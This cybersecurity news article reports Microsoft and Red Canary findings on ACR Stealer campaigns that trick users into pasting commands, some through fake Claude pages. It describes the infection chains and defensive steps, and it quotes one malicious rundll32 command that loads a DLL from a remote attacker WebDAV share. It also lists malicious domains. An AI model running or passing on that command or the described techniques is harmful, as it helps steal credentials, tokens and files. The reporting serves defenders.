Close Menu
    What's Hot

    Neil Rimer thinks the AI money is coming back out

    why this time might not be different

    Superdrug owner considers delay to planned London IPO

    Facebook X (Twitter) Instagram
    Trending
    • Neil Rimer thinks the AI money is coming back out
    • why this time might not be different
    • Superdrug owner considers delay to planned London IPO
    • ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
    • Your company doesn’t have a talent shortage. It has a talent visibility problem
    • Israel’s ‘Crimson Thread’ military barrier is strangling the West Bank | Israel-Palestine conflict News
    • The Open: Bryson DeChambeau handed two-shot penalty after controversial ruling in second round at Royal Birkdale | Golf News
    • They Called Sam Neill ‘Skux.’ (It Was a Compliment.)
    interluknewsinterluknews
    • Home
    • Business
      • Corporate News
      • Industry Insights
      • Startups & Entrepreneurship
      • Technology & Innovation
    • Economy
      • Economic Policy
      • Financial Analysis
      • Inflation & Interest Rates
      • Trade & Markets
    • Global
      • Conflicts & Security
      • Diplomacy
      • Global Trends
      • International Affairs
    • Lifestyle
      • Fashion
      • Food & Dining
      • Personal Development
      • Travel
    • Opinion
      • Columns
      • Editorials
      • Expert Opinions
      • Reader Voices
    • More
      • Politics
        • Elections
        • Government & Policy
        • International Relations
        • Political Analysis
      • Sports
        • Cricket
        • Football / Soccer
        • International Sports
        • Local Sports
      • Technology
        • Artificial Intelligence
        • Cybersecurity
        • Gadgets & Reviews
        • Tech News
      • South Africa News
    Facebook X (Twitter) Instagram
    interluknewsinterluknews
    Cybersecurity

    ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

    adminBy adminJuly 18, 2026No Comments7 Mins Read
    Share Facebook Twitter Pinterest Copy Link Telegram LinkedIn Tumblr Email
    ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
    Share
    Facebook Twitter LinkedIn Pinterest Email

    ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

    ACR Stealer, an infostealer in circulation since 2024, is walking out of enterprise networks with saved browser passwords, live session tokens, PDFs, Microsoft 365 documents, and files from synced OneDrive and SharePoint folders.

    It gets in because someone pasted a command into a Run box and pressed Enter. Microsoft laid out two of the delivery chains on Thursday. Its Defender Experts team, the company’s managed detection arm, had watched ACR Stealer activity climb across customer environments from late April to mid-June, and says the campaigns are “successfully using ClickFix lures to steal browser credentials, authentication tokens, and sensitive documents.”

    Both chains open with the same prompt, then split: one leaves traces on disk, the other runs almost entirely in memory. Microsoft’s remediation guidance tells victims to revoke tokens, not just rotate passwords.

    A payload in the pixels

    The prompt likely arrives through malvertising or SEO-manipulated search results, the report says. The fileless chain starts when the pasted command spawns mshta.exe to pull remote HTA content. An embedded VBScript loader leans on COM objects to decode and fire PowerShell; that stage mints a victim ID, disables certificate validation, and runs what it retrieves in memory.

    What it retrieves is a JPEG from an image host, with the payload sitting in the pixels. Custom routines carve it out, decrypt it, decompress it, and execute it reflectively. Then it goes for Chrome and Edge, reading the Login Data and Web Data databases and invoking DPAPI to decrypt the passwords, cookies, and tokens they hold. The PDFs on the Desktop and in Downloads go too.

    On May 26, SANS Internet Storm Center handler Brad Duncan documented a Windows infection he traced to a page impersonating Claude, Anthropic’s AI assistant, reached through malicious Google ads and often hidden behind sites.google.com URLs. The page served macOS instructions when opened on a Mac and Windows instructions when opened on Windows.

    Cybersecurity

    Microsoft never names the lure. Two of the indicators in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc, are listed as a payload host and a C2. The Hacker News matched both to Duncan’s chain, which ran through subdomains of each seven weeks earlier, and Microsoft’s report cites his diary among the references.

    That chain also pulled a 628 KB JPEG from ImgBB, an image-hosting service. He flagged it as part of the infection and got nothing out of it: “nor could I find any obvious signs of embedded data.”

    Red Canary had logged Claude-branded lures a month earlier, delivering ACR Stealer through fake Claude Code pages on GitLab such as claude-desktop[.]gitlab[.]io.

    The other chain leaves fingerprints

    Microsoft’s first chain writes to disk, which leaves defenders more to work with. The pasted command pulls a DLL straight off a WebDAV share over HTTPS, using a GUID directory and a filename built to pass as something else; the report’s example is google.ct.

    Red Canary published the same shape in its May report, from April telemetry, weeks before Microsoft’s writeup:

    "C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

    Two of the three variants Defender Experts saw use pushd to mount the remote share as a temporary local drive first, so the payload runs through what looks like a local path. The stealthiest wraps that in conhost.exe --headless to kill the console window and hides the strings for pushd, rundll32, and the remote host behind delayed environment-variable expansion.

    What follows is obfuscated PowerShell. It drops a ZIP into a folder under %LocalAppData%\Temp with an innocuous name; Microsoft’s example is LogiOptionsPlus. A bundled pythonw.exe then launches the Python script, so nothing flashes on screen. The installer wipes older copies before installing, which makes it an updater.

    It persists through a hidden scheduled task posing as a software update, copies timestamps off notepad.exe onto its own files, and clears PowerShell history behind it. The last stage stays in memory, handing execution through the Windows Fiber API.

    In a subset of these intrusions, a second Python loader talks to public blockchain RPC endpoints and Web3 node infrastructure, likely pulling a payload or a C2 address off a public ledger. Microsoft names the technique EtherHiding: put the pointer in a smart contract, and there is no attacker-controlled resolver left to seize.

    No bug, no numbers

    Neither chain exploits a vulnerability. Both inherit exactly what the signed-in user already has, and every layer downstream, the WebDAV mount, the pixel extraction, the in-memory handoff, only runs because a person read a prompt and pressed Enter. There is no CVE in this story. Patching does not remove the paste-and-run path.

    Microsoft says the lures are working, but never quantifies it. The report gives no victim count, no number of affected customers, and no baseline for the increase it reports.

    Red Canary’s April telemetry at least has numbers. ClearFake, a web-inject cluster that has been feeding ACR Stealer since at least March 2025, took the No. 1 spot on its most-prevalent-threat list for the first time that month, and ACR Stealer entered the top ten at a tie for sixth.

    Cybersecurity

    The cluster delivers through JavaScript injected into compromised sites, and Microsoft’s report does not mention it in either chain.

    Whose stealer is this?

    Microsoft is careful about what it claims. It ties the activity to ACR Stealer on observed behavior and post-exploitation tradecraft, checked against what is publicly known about the family’s infrastructure, and names no threat actor at all. The caution is earned.

    ACR, also written up as AcridRain, was marketed on Russian-speaking forums by an actor known as SheldIO, who shut down sales in July 2024. The accounts split on what happened next. eSentire says the source code was sold off. Proofpoint’s account differs: the same Telegram channel called the shutdown, not a goodbye from the team, and the Amatera panel surfaced five months later.

    On the rebrand, they agree. Proofpoint reported in June 2025 that “ACR Stealer was significantly updated and rebranded as Amatera Stealer,” priced from $199 a month to $1,499 a year. Red Canary treats ACR and Amatera as one family and assesses ACR itself as an updated GrMsk Stealer.

    A July 2026 detection labelled ACR Stealer is a behavioral call on a codebase that has been renamed at least once and may have changed owners. The label describes the code. It does not tell you who is running it.

    Where to stop it

    One control sits upstream of every technique above: neither chain runs without a user pasting a command into the Run dialog.

    • Cut the vector. eSentire recommends removing the Run prompt via GPO and blocking mshta.exe through AppLocker or WDAC.
    • Use application control and attack surface reduction rules so PowerShell, Python, mshta.exe, and rundll32.exe cannot launch internet-delivered content from Downloads, Temp, or %LocalAppData%.
    • Hunt rundll32.exe running with no command-line parameters while making a network connection, which is Red Canary’s detection opportunity for this family. Add scheduled tasks masquerading as software updates, timestomping, and PowerShell history clearing.
    • On a suspected host, isolate, rotate credentials, revoke tokens, and check outbound connections to remote shares and image-hosting services.

    Microsoft shipped three Defender XDR hunting queries and 16 campaign domains with the report.

    Those indicators are a slice, and the report says so: representative, not the family’s full range, with more campaigns and infrastructure likely active. Domains rotate. The ask at the front does not, because it works. The lures overlap rather than replace one another: Red Canary saw fake CAPTCHAs and fake Claude pages in the same April telemetry.

    ACR Browser ClickFix files Lures Microsoft steal Stealer Tokens
    Follow on Google News Follow on Flipboard
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
    Previous ArticleYour company doesn’t have a talent shortage. It has a talent visibility problem
    Next Article Superdrug owner considers delay to planned London IPO
    admin
    • Website

    Related Posts

    Armenia Detains Russian Tourist on U.S. Warrant for REvil Hacker, Lawyers Say Wrong Man

    July 18, 2026

    GoldenEyeDog Subgroup Linked to DigiCert Breach and Code-Signing Certificate Theft

    July 18, 2026

    OpenSSL HollowByte Flaw Could Freeze Server Memory with 11-Byte TLS Requests

    July 18, 2026
    Leave A Reply Cancel Reply

    Demo
    Latest Posts

    Neil Rimer thinks the AI money is coming back out

    why this time might not be different

    Superdrug owner considers delay to planned London IPO

    ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

    Latest Posts

    Subscribe to News

    Get the latest sports news from NewsSite about world, sports and politics.

    Advertisement
    Demo

    We are a digital news platform delivering timely, accurate, and insightful coverage of politics, global affairs, business, economy, sports, and more. Our mission is to keep readers informed with reliable news, clear analysis, and stories that truly matter.
    We're social. Connect with us:

    Facebook X (Twitter) Instagram Pinterest YouTube

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Type above and press Enter to search. Press Esc to cancel.

    Powered by
    ...
    ►
    Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
    None
    ►
    Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
    None
    ►
    Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
    None
    ►
    Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
    None
    ►
    Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
    None
    Powered by